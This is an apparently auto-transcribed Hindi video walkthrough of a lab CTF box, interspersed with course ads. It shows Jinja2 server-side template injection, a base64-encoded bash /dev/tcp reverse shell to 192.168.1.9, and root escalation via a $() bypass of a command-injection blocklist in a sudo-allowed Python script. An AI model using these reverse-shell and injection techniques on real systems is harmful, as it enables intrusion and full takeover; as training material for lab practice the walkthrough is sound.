होल्ड ऑन 1 सेकेंड। यहाँ पे मेरे पास यस अभी मैंने राइट कॉपी किया एंड यहाँ पे इसको भी पेस्ट किया। देखता हूँ क्या इन्फॉर्मेशन सर्वर डिलीवर करता है। एंड गाइस यहाँ पर मेरे पास डिफ़ॉल्ट SSL की कॉन्फ़िगरेशन फ़ाइल आ रही है एंड यहाँ पर इसने मेंशन किया है डोमेन लीकिंग कर रहा है security.mrwebsecure.conf है। ओके, जो कि अभी हमने देखा वहाँ पे वर्डप्रेस वेबसाइट का कॉन्फ़िगरेशन था। लेकिन गाइस यहाँ पे अनदर डोमेन लीक कर रहा है और ये जो डोमेन है joincesclasses.mrwebsecure.ctf, और ये डोमेन कहाँ पे पॉइंट कर रहा है, इस डिफ़ॉल्ट SSL के फाइल में। ओके गाइस, और मैं इसको भी ट्राई कर ले रहा हूँ एंड यहाँ पे where www का पाथ दिया गया और यहाँ पे कोई सेंसिटिव इन्फॉर्मेशन लीक नहीं हो रही है। लेकिन मेरा अगला थॉट क्या है, मुझे एक सब डोमेन मिला है, तो मैं इसको कॉपी कर ले रहा हूँ एंड ऐड कर रहा हूँ अपने अगेन इसी सब डोमेन के फोल्डर में। ओके, nano etc/host, तो मैं यहाँ पे आ रहा हूँ, लास्टली जंप कर रहा हूँ एंड यहाँ पे इसको पेस्ट कर दे रहा हूँ एंड सेव करके एग्जिट कर दे रहा हूँ एंड मैं ये ट्राई करता हूँ, देखता हूँ क्या इसकी वेबसाइट ओपन हो रही है कि नहीं। ज्वाइन CH क्लासेस, मैं इसको पेस्ट कर रहा हूँ एंड बूम, यहाँ पे ये वेबसाइट ओपन हुआ गाइस, लेकिन बट यहाँ पे नॉट फाउंड आ रहा है। तो नॉट फाउंड, ऑफकोर्स मैं ये ट्राई करूँगा कि इस वेबसाइट पे कोई भी पेज होस्टेड है या नहीं। तो मैं यहाँ पे कर्ल हाइफन हेड का यूज़ करूँगा एंड इस वेबसाइट को पेस्ट करूँगा। क्यों? क्योंकि मैं ये देखना चाहता हूँ कि क्या एक्चुअल में इस वेबसाइट पे है कुछ कंटेंट। लेकिन यहाँ पे मेरे पास 404 नॉट फाउंड आ रहा है, NGINX आ रहा है एंड यहाँ पे कंटेंट लेंथ 2, यानी कि ये जो वेब एप्लीकेशन है NGINX के सर्वर पर सेटअप है। आई गेस जब भी ऐसे केसेस होते हैं तो आप PHP का मोस्टली कम अटैक ट्राई करना और NGINX जैसे पाइथन पर रूबी के अटैक्स ज़्यादा ट्राई करना। लेकिन मेरे पास यहाँ पे डोमेन आ रहा है तो मैं इसकी टेक्नोलॉजी को फाइंड करता हूँ। तो मैं index.php ट्राई कर रहा हूँ। वेलकम टू index.php, वाओ। मैं यहाँ पे index.html ट्राई कर रहा हूँ एंड index.html आई रियलाइज़ कि यहाँ पर जो भी यूज़र इनपुट कर रहा है वो चीज़ें वेलकम टू प्रोफाइल के साथ यहाँ पे प्रिंट हो रही हैं, यानी कि मोस्टली यूज़र इनपुट का फील्ड मुझे लग रहा है। मैं यहाँ पे हैकर टाइप कर रहा हूँ एंड वेलकम टू द प्रोफाइल ऑफ द हैकर, यानी कि आई गेस कि ये यूज़र इनपुट का फील्ड है और यहाँ पर जो भी यूज़र इनपुट कर रहा है उसको डिस्प्ले किया जा रहा है।
ओके, जब भी ऐसा फील्ड आपको देखने को मिले तो आपका फर्स्ट थॉट यही जाना चाहिए कि आप वहाँ पे स्पेशल कैरेक्टर से फज करना, और फज करने के बाद जिस भी स्पेशल कैरेक्टर पे एरर जनरेट करे और वो अटैक ट्राई करना। ओके गाइस, तो मैं यहाँ पे मिस्टर वेब सिक्योर ट्राई कर रहा हूँ एंड यहाँ पर भी मेरे पास आ रहा है वेलकम टू द मिस्टर वेब सिक्योर, वेलकम टू द प्रोफाइल ऑफ द मिस्टर वेब सिक्योर। सो गाइस, यहाँ पे मैं फजिंग करके ट्राई करके देखता हूँ क्या रिस्पॉन्स आ रहा है। तो बेसिकली मैं यहाँ पे ये जो रिक्वेस्ट है ना, मैं यहाँ पे इसको कॉपी कर ले रहा हूँ और मैं यहाँ पे यूज़ कर रहा हूँ फिर से अगेन फफ का। तो मैं यहाँ पे फफ, उसके बाद -u, उसके बाद मैं इसको पेस्ट कर रहा हूँ एंड यहाँ पे मैं फज टाइप कर दे रहा हूँ, फज -w ऑफ सेकलिस्ट। उसके बाद मैं यहाँ पे फजिंग ट्राई कर रहा हूँ, फजिंग, उसके बाद फजिंग में मैं यहाँ पे स्पेशल कैरेक्टर्स का यूज़ करूँगा। स्पेशल कैरेक्टर्स एक्चुअल में क्यों, क्योंकि हमको क्या करना है, उस इनपुट के फील्ड पे स्पेशल कैरेक्टर्स को ऐड करना है। जिस भी स्पेशल कैरेक्टर पर एरर जनरेट करे वो वल्नरेबिलिटी हो सकती है। अभी देखना कैसे मैं फाइंड कर रहा हूँ। तो यहाँ पर मेरे पास बेसिकली मैंने हर स्पेशल कैरेक्टर को वहाँ पर फज किया और मैं देखना चाहता हूँ कि क्या कुछ डिफरेंट आ रहा है। एंड यहाँ पे मेरे पास कुछ भी ऐसा डिफरेंट देखने को नहीं मिल रहा है गाइस, सभी पे वही सेम इन्फॉर्मेशन आ रही है। यहाँ पे मेरे पास कोई भी एक्सटर्नल इन्फॉर्मेशन नहीं आ रही है। तो मैं यहाँ पे क्या कर रहा हूँ, उसको कंट्रोल-C कर रहा हूँ एंड मैं इस ऑप के चेकलिस्ट को मैं यहाँ से कॉपी कैट कर रहा हूँ एंड यहाँ पे पेस्ट कर रहा हूँ एंड इसको कॉपी कर ले रहा हूँ, सिलेक्शन, क्लिपबोर्ड। अब मैंने यहाँ पे इसको कॉपी कर लिया एंड अगेन आके मैं ओवरऑल सभी को यहाँ पे पेस्ट करूँगा एंड मैं हिट एंटर कर रहा हूँ एंड गाइस यहाँ पे मुझे ये फॉर्मेट डिस्प्ले हो रहा है। ओके, एंड यहाँ पे कोई एरर जनरेट नहीं कर रहा है। आई गेस कि यहाँ पे मेरे पास कोई एरर जनरेट नहीं कर रहा है। तो मैं यहाँ पे टेम्पलेटिंग ट्राई कर रहा हूँ, जैसे कि यहाँ पे एंड देखता हूँ क्या यहाँ पे कोई एरर जनरेट होता है। जैसे मैं यहाँ पे टेम्पलेटिंग ट्राई कर रहा हूँ एंड इंटरनल सर्वर एरर आ रहा है। ओके गाइस, अगर मैं यहाँ पे लाइक मिस्टर वेब सिक्योर के बाद सिंगल कोट ट्राई करता हूँ, देखता हूँ ये एज इट इज़ प्रिंट हो रहा है। और मैं यहाँ पे ये SQL इंजेक्शन मैंने ट्राई किया तो यहाँ पे मेरा एज इट इज़ प्रिंट हो रहा है। मैं यहाँ पे क्रॉस साइट स्क्रिप्टिंग का कोड पेस्ट करता हूँ तो यहाँ पे मेरे पास एज इट इज़ डिस्प्ले हो रहा है। और मैं यहाँ पे ये टेम्पलेट इंजेक्शन का कोड ट्राई कर रहा हूँ तो यहाँ पे मेरे पास इंटरनल सर्वर आ रहा है, एरर आ रहा है, यानी कि ये जो पैरामीटर है, ये जो इनपुट का फील्ड है, ये वल्नरेबल है किससे, सर्वर साइड टेम्पलेट इंजेक्शन अटैक से। तो बेसिकली मैं यहाँ पे SSTI का चीट शीट ओपन कर रहा हूँ गिटहब से। ओके, तो यहाँ पे मोस्टली मैं ये फाइंड करूँगा कि ये जो SSTI है यानी सर्वर साइड टेम्पलेट है वो किस बेस्ड है। तो यहाँ पे मैं इसको ट्राई कर रहा हूँ, अगर ये मेरा एग्जीक्यूट हो रहा है, ओके, अगर ये मेरा यहाँ पे वैल्यू रिटर्न कर रहा है तो इसको हम ट्राई करेंगे। अगर वैल्यू रिटर्न नहीं कर रहा है तो ये वल्नरेबल नहीं है। तो मैं यहाँ पे 7 ट्राई कर रहा हूँ। सबसे पहले 7 इंटर कर रहा हूँ एंड ये मेरा 49 रिजल्ट कर रहा है। तो इसका मतलब ये वल्नरेबल है किससे, अभी मैं कंफर्म नहीं हूँ कि किससे वल्नरेबल है। मैं अभी इस पैरामीटर को ट्राई कर रहा हूँ। अगर 7 टाइम्स 7 आया तो फिर ये हो सकता है। देखते हैं क्या रिस्पॉन्स आता है। यहाँ पे सिंगल कोट, यहाँ पे भी सिंगल कोट एंड यहाँ पे 7 टाइम्स 7 आया। अगर 7 टाइम्स 7 रिजल्ट आ रहा है तो इसका मतलब वो क्या हो सकता है, जिंजर 2। अगर 7 × 7 हो गया तो ट्विग होता है, यानी कि जो PHP का टेम्पलेट होता है। तो मैं ये कंफर्म हो चुका कि ये जिंजर 2 टेम्पलेटिंग है। तो जिंजर 2 के मैं यहाँ पे अटैक्स ट्राई कर रहा हूँ। तो मैं यहाँ पे डाउन आता हूँ, जिंजर 2 पे मुझे क्या चाहिए, रिवर्स सेल चाहिए। तो मैं यहाँ पे क्या ट्राई कर रहा हूँ, रिमोट कोड एग्जीक्यूशन में मैं यहाँ पे इसके सिस्टम के सेल को लेना चाहता हूँ। तो यहाँ पे मेरे पास आ रहा है p ओपन रीड। तो मैं यहाँ पे जिंजर 2 की अटैक ही ट्राई करूँगा। तो मैं यहाँ पे इसके कोड को कॉपी कर ले रहा हूँ एंड गाइस मैं यहाँ पे इसको एक फ़ाइल में सेव कर दे रहा हूँ, nano cell.py के नाम से इसको यहाँ पे पेस्ट कर दे रहा हूँ। एंड सबसे पहले मैं अपनी IP कॉपी कर ले रहा हूँ, क्योंकि मुझे यहाँ पे रिवर्स सेल जनरेट करना है। तो मैं इसको कॉपी कर ले रहा हूँ, bash -c
बैश डैश आई, यहाँ पे डेव TCP 192.168.1.9/9001 पर मैं रिवर्स सेल ले रहा हूँ। सो गाइस, अगर आपको नहीं पता है ये सब चीज़ें क्या होती है, कैसे करते हैं, तो आप मिस्टर वेब सिक्योर को अभी ज्वाइन कर सकते हैं। यहाँ पर आपको बहुत सारी चीज़ें सीखने को मिलती है, लाइक परफेक्ट रिवर्स सेल लेना, वेबसाइट पेनिट्रेशन टेस्टिंग, मोबाइल पेनिट्रेशन टेस्टिंग, CTFs, उसके ऊपर डीप में आपको नॉलेज प्रोवाइड की जाती है विथ प्रैक्टिकल के साथ। ओके गाइस, तो मैं यहाँ पे क्या कर रहा हूँ, 0 and 1, तो मैं यहाँ पे इसको एक प्रॉपर रिवर्सल, मैं इसको टेस्टिंग कर ले रहा हूँ सबसे पहले NC-LV 9001 पे मैं इसको टेस्टिंग कर ले रहा हूँ कि देखता हूँ कि ये मेरा जो कोड है ये प्रॉपर वर्क कर रहा है या नहीं। तो मैं यहाँ पे इसको कॉपी एंड पेस्ट एंड बूम, ये मेरा यहाँ पे वर्क कर रहा है। तो अभी मैं यहाँ पे क्या कर रहा हूँ, इसको इनकोड कर दे रहा हूँ बेस 64 से। तो मैं इसको इको कर रहा हूँ। ओके, मैं इसको लास्ट में जंप कर रहा हूँ एंड यहाँ पे बेस 64-W0, यहाँ पे मैंने इसको इनकोड कर दिया। एंड गाइस, यहाँ पे मेरे पास प्लस आ रहा है जो कि बैड कैरेक्टर का साइन है। मैं यहाँ पे इस बैड कैरेक्टर्स को रिमूव कर रहा हूँ एंड यस, अभी मेरे पास यहाँ पे कंप्लीट फॉर्मेट आ गया। इसको कॉपी कर ले रहा हूँ एंड मैं यहाँ पे क्या कर रहा हूँ, एको और उसके बाद इसको पेस्ट कर रहा हूँ, पाइप बेस 64-D और पाइप बैश। मैं इस कोड को यूज़ कर रहा हूँ रिवर्सल लेने के लिए। गाइस, अगर आपको नहीं पता ये सब चीज़ें क्या होती है तो आप मिस्टर वेब सिक्योर को अभी ज्वाइन कर सकते हैं। ओके, क्योंकि बेसिकली ये पार्ट होता है CTF का, रिवर्स सेल कैसे लिया जाता है ये भी पार्ट होता है। ओके गाइस, तो मैं यहाँ पे क्या कर रहा हूँ, ज्वाइन CH पे इसको पेस्ट कर रहा हूँ, लेकिन उससे पहले मैं यहाँ पे क्या स्टार्ट कर दे रहा हूँ, NC-NV के लिसनिंग स्टार्ट कर दे रहा हूँ। एंड ऑलरेडी मैं यहाँ पर हूँ, तो मैं यहाँ पे NC-NVLP 9001 पर मैंने लिसनिंग स्टार्ट कर दिया। ओके गाइस, तो मैं यहाँ पे मोजिला फायरफॉक्स पे विज़िट कर रहा हूँ एंड इसको रिमूव कर रहा हूँ एंड यहाँ पे ये जो कोड मैंने कॉपी किया था एंड पेस्ट कर रहा हूँ। एंड गाइस, यहाँ पे मेरे पास सेल नहीं डिलीवर हुआ, यहाँ पे मेरे पास सेल डिलीवर नहीं हुआ। क्यों? क्योंकि यहाँ पे मे बी बैड कैरेक्टर्स हैं। यस, ओके गाइस, मेरे पास यहाँ पे बैड कैरेक्टर, जो बैड कैरेक्टर है वो प्लस का है। तो मैं यहाँ पे क्या कर रहा हूँ, मेरे पास एक बैड कैरेक्टर्स है, तो मैं यहाँ पे फिर से इसको ट्राई कर रहा हूँ। ओके, एंड यहाँ पे एक बैड कैरेक्टर है, ओके, प्लस का, तो मैं यहाँ पे इसको अवॉइड करता हूँ। मैं यहाँ पे स्पेस देता हूँ क्योंकि बैड कैरेक्टर नहीं होना चाहिए पेलोड में, नहीं तो सिस्टम उसको एज अ बैड कैरेक्टर जब लेकर चलेगा, जिससे अपने को सेल नहीं मिला। उसके पीछे का रीज़न क्या है, बैड कैरेक्टर। फिर से मैं यहाँ पे एको कर रहा हूँ और इसको पेस्ट कर रहा हूँ एंड बेस 64-D, उसके बाद मैं पाइप बैश कर रहा हूँ। ओके गाइस, मैं इसको क्लोज कर दे रहा हूँ, इसको कॉपी एंड पेस्ट किया एंड यहाँ पे ऑलरेडी लिसनिंग स्टार्ट किया 9001 पे स्टार्ट हो चुकी है लिसनिंग। मैं यहाँ से इसको रिमूव कर रहा हूँ अभी, बैश को इंटर एंड अनसक्सेसफुल ऑफ रिमोट सेल। यहाँ पे मुझे रिमोट सेल नहीं मिला गाइस। ओह, आई एम इडियट, बिकॉज़ यहाँ पे मैंने ये जो कॉपी किया था इसको मुझे यहाँ पे cell.py के अंदर पेस्ट करना था। ओके गाइस, तो मैं यहाँ पर ये कमांड ट्राई कर रहा हूँ। ओके, मैं इसको यहाँ पे पेस्ट कर रहा हूँ एंड सेव कर रहा हूँ एंड यहाँ से cell.py को कॉपी कर रहा हूँ। ओके, क्योंकि वल्नरेबिलिटी तो ये पार्ट की है ना, तो मैं वहाँ पे क्या ट्राई कर रहा था, NC-NVLP 9001। मैं इसको यहाँ से रिमूव कर रहा हूँ, इसको पेस्ट कर रहा हूँ एंड इंटरनल सर्वर एरर, एको बेस 64-D पाइप आउट बैश। यहाँ पे गाइस मेरे पास स्पेस डिलीवर हुआ, वाई सर्वर इज़ नॉट गिविंग द रिवर्सल। होल्ड ऑन 1 सेकेंड। कैट से पहले मैं यहाँ पे पेलोड ऑल द थिंग पे विज़िट करूँ, मैं इसी कोड को कॉपी कर रहा हूँ एंड यहाँ पे ट्राई कर रहा हूँ क्या इसका रिस्पॉन्स आ रहा है जो मैं यहाँ पे
ब्लाइंडली पेलोड को ट्राई कर रहा हूँ एंड गाइस यहाँ पे रिस्पॉन्स आ रहा है एंड माई फॉल्ट इज़ वाओ। होल्ड ऑन 1 सेकेंड। ओके, मैं इसको क्लोज कर दे रहा हूँ। nanoshell.py को ओपन कर रहा हूँ एंड गाइस यहाँ पे बेसिकली एको, उसके बाद यहाँ पे ये पेलोड बेस 64 डी, उसके बाद पाइप आउट टू बैश। ओके गाइस, बिकॉज मैंने यहाँ पे रॉन्ग मेंशन किया है कुछ चीज़ें। होल्ड ऑन 1 सेकेंड, मैं आपको दिखाता हूँ मेरे तरफ से क्या मिस्टेक हुई। बिकॉज मैंने यहाँ पे एको का फॉर्म कहीं और फ्लो कर दिया। इस कोड को मुझे आईडी पी ओपन के फॉर्म में रखना था। ओके गाइस, तो होल्ड ऑन 1 सेकेंड। अगेन मैं इस कोड को कॉपी कर रहा हूँ। यहाँ पे मैं cell.py को मैं ओपन कर रहा हूँ एंड इसको क्लोज कर रहा हूँ, इसको यहाँ पे पेस्ट कर रहा हूँ, सेव कर रहा हूँ एंड अगेन ये जो कोड है तो मैं यहाँ से इसको कॉपी कर रहा हूँ। बैश तक मैंने इसको कॉपी किया एंड nanoshell.py पे मैं यहाँ पे जंप कर रहा हूँ एंड आईडी के पास आके इसको पेस्ट कर रहा हूँ। ओके, बैश, होल्ड ऑन 1 सेकेंड, और यहाँ पे डी के पास स्पेस नहीं रहना चाहिए एंड बैश, एवरीथिंग इज़ गुड। अभी मैं ये पेलोड यहाँ पे ट्राई कर रहा हूँ। तो मैं यहाँ पे इसको कॉपी पेस्ट किया nc-nvlp 9001 और मैंने हिट एंटर कर दिया और अगेन यहाँ पे जंप कर रहा हूँ, इसको पूरी तरह मैं रिमूव कर रहा हूँ, यहाँ पे पेस्ट एंड बूम। सी गाइस, यहाँ पे मेरे पास सक्सेसफुली रिवर्स सेल डिलीवर हो चुका है। तो मैं एलएस कर रहा हूँ एंड हमको सक्सेसफुली फर्स्ट स्टेप क्रॉस हो चुका है। तो मैं यहाँ पे विच पाइथन कर रहा हूँ क्योंकि मैं एक प्रॉपर टीटीवाई सेल लेना चाहता हूँ। सो गाइस, अगर आपको नहीं पता ये सब चीज़ें कैसे करते तो आप मिस्टर वेब सिक्योर को अभी ज्वाइन कर सकते हो। तो मैंने विच पाइथन किया। यहाँ पर आप CTF आपको प्रोवाइड्स किए जाते हैं, लाइक CTF को कैसे कैप्चर करते हैं। ओके, आप बेसिकली इसका अगर आप यहाँ से सीखते हैं तो आप इजीली हैक द बॉक्स या OSCP जैसे एग्ज़ाम्स को इजीली क्लियर कर सकते हैं। ओके गाइस, सो मैं यहाँ पे टाइप कर रहा हूँ पाइथन 3, उसके बाद -c import pty.spawn, उसके बाद bin bash। ओके गाइस, तो मैं यहाँ पे एक प्रॉपर TTY से ले रहा हूँ। ओके, STTY raw -echo fg एंटर एक्सपोर्ट टर्म इक्वल टू एक्स टर्म एंटर एंड क्लियर। सो गाइस, यहाँ पे मेरे पास एक फाइनली TTY सेल आ चुका है। अभी मैं लेवल 2 यानी कि मैं आईडी टाइप कर रहा हूँ, तो मैं एक यूज़र के फोल्डर में हूँ एंड जंप कर रहा हूँ CD के पार्ट में एंड cat user.txt, दिस इज़ योर फर्स्ट फ्लैग। ओके गाइस, तो मेरा अगला थॉट क्या है, रूट जाने का। तो मैं यहाँ पे sudo-l ट्राई कर रहा हूँ एंड गाइस नो पासवर्ड यूज़र बिन love.py को आप एज अ रूट रन कर सकते हो। तो मैं यहाँ पे इसको ट्राई कर रहा हूँ, देखता हूँ सबसे पहले यूज़र बिन love.py में है क्या कंटेंट। तो मैं यहाँ पे जंप कर रहा हूँ एंड यहाँ पे क्या कंटेंट है। बेसिकली यहाँ पे मुझे लेवल 2 वेब यहाँ पे मैं इसके कंटेंट को रीड कर रहा हूँ। इंटर योर IP os.system यानी कि कमांड इंजेक्शन। ओके गाइस, सी os.system, यहाँ पे अगर मैं पिंग फंक्शन को एग्जीक्यूट करता हूँ, अगर मैं पिंग को एग्जीक्यूट करता हूँ तो बेसिकली यहाँ पे क्या क्या चीज़ें ब्लॉक्ड हैं। सबसे पहले मैं एंड का यूज़ नहीं, सेमीकोलन का यूज़ नहीं एंड यहाँ पर ये ब्लॉक्ड फंक्शन है। गाइस, अगर आपने कमांड इंजेक्शन को अच्छे से रीड किया होगा तो मैं एक स्टेप और यहाँ पर दिखाना चाहता हूँ। कमांड इंजेक्शन के पार्ट में मैं नए टैब में ओपन करता हूँ। आप इसका यूज़ करके भी कमांड इंजेक्शन ट्राई कर सकते हैं। क्यों? क्योंकि ये इनलाइन कमांड इंजेक्शन होता है। ओके गाइस, अगर आपको नहीं पता तो मिस्टर वेब सिक्योर अभी आप ज्वाइन कर सकते हैं। लेकिन ये जो पार्ट है ना, यहाँ पर इसकी ब्लॉकिंग नहीं की गई है। होल्ड ऑन 1 सेकेंड, वेयर इज़ कोड, यहाँ पर एंड को ब्लॉक किया है। ओके, जो कि कमांड इंजेक्शन है। सेमीकोलन को ब्लॉक किया है। ओके, कमांड इंजेक्शन है। यहाँ पे ये बैक टिक को ब्लॉक किया है। उसके बाद यहाँ पे पाइप को ब्लॉक किया, लेकिन यहाँ पे इसने डॉलर और
पैरेंथिस को उसने ब्लॉक नहीं किया है, तो आई गेस मुझे वो ट्राई करना चाहिए। और यहाँ पर ये क्या कर रहा है, os.system से पिंग कमांड को एग्जीक्यूट कर रहा है। तो लेट्स एग्जीक्यूट दिस कमांड। मैं sudo l कर रहा हूँ, उसके बाद sudo user bin love.py, लेकिन उसके पास मेरे पास एक सेकेंड, मैं इसको ट्राई कर रहा हूँ। आप यहाँ पे आईपी को पिंग कर सकते हैं, तो मैं यहाँ पे पिंग करना चाहता हूँ, -p मेंशन कर रहा हूँ। मैं यहाँ पे ये अटैक ट्राई कर रहा हूँ। ओके गाइस, होल्ड ऑन 1 सेकेंड, वेयर इज़ आईडी, इंटर एंड बूम। तो मैं यहाँ पे इसका क्या कर रहा हूँ, फाइनली रिवर्स सेल ले रहा हूँ। यहाँ पे मेरे पास आईडी आ रही है रूट, तो मैं इसका रिवर्स सेल ले रहा हूँ। तो मैं यहाँ पे cd temp के अंदर एक फ़ाइल क्रिएट कर रहा हूँ cell.sh के नाम से। एक सेकेंड, नैनो टेम्प cell.sh के नाम से मैं एक फ़ाइल क्रिएट कर रहा हूँ। व्हाट्स गोइंग ऑन, bin bash -c bash -i dev tcp 192.168.1. My system IP is ifconfig 9, तो 1.9/9002, क्योंकि मैंने ऑलरेडी उस पर सेल ले रखा है पाइप। एंड ये मैं इसको क्लोज कर रहा हूँ एंड सेव। ओके गाइस, तो मैं यहाँ पे अगेन वही बैक कमांड फिर से फायर करता हूँ, cell.sh के नाम से है। तो मैं यहाँ पे पाइप, उससे पहले मैं यहाँ पे nc-nblp 9002 को मैं एग्जीक्यूट कर ले रहा हूँ। एंड यहाँ पे what's wrong with you temp cell.sh enter, what's going on, ping bash cell.sh को मैं यहाँ पे पेस्ट कर रहा हूँ। temp destination address required, यहाँ पे ओह सॉरी गाइस, एक सेकेंड, सॉरी, nano/temp/cell.sh। ओके, मेरा यहाँ पे रॉन्ग क्या है, dev tcp। ओके गाइस, सेव, पेस्ट कर रहा हूँ, इंटर एंड बूम। सो गाइस, मेरे पास यहाँ पे सक्सेसफुली रूट का सेल मिल चुका है। एंड मैं यहाँ पे cd के फोल्डर में जंप कर रहा हूँ एंड get root.txt। सो दिस इज़ द चैलेंज ऑफ मिस्टर बॉक्स CTF। सो गाइस, होप यू आपको ये वीडियो पसंद आया होगा। अगर आपको ये वीडियो पसंद आया तो इस वीडियो को आप फैमिली, फ्रेंड्स, सोशल मीडिया के ग्रुप्स पे शेयर करिए। और अगर आप मिस्टर वेब सिक्योर से 1-to-1 ऑफलाइन कोर्सेज करना चाहते हैं तो नीचे दिए गए नंबर पर आप कॉल कर सकते हैं। मिलते हैं किसी न्यू वीडियो में, तब तक सी यू सून, गुड बाय।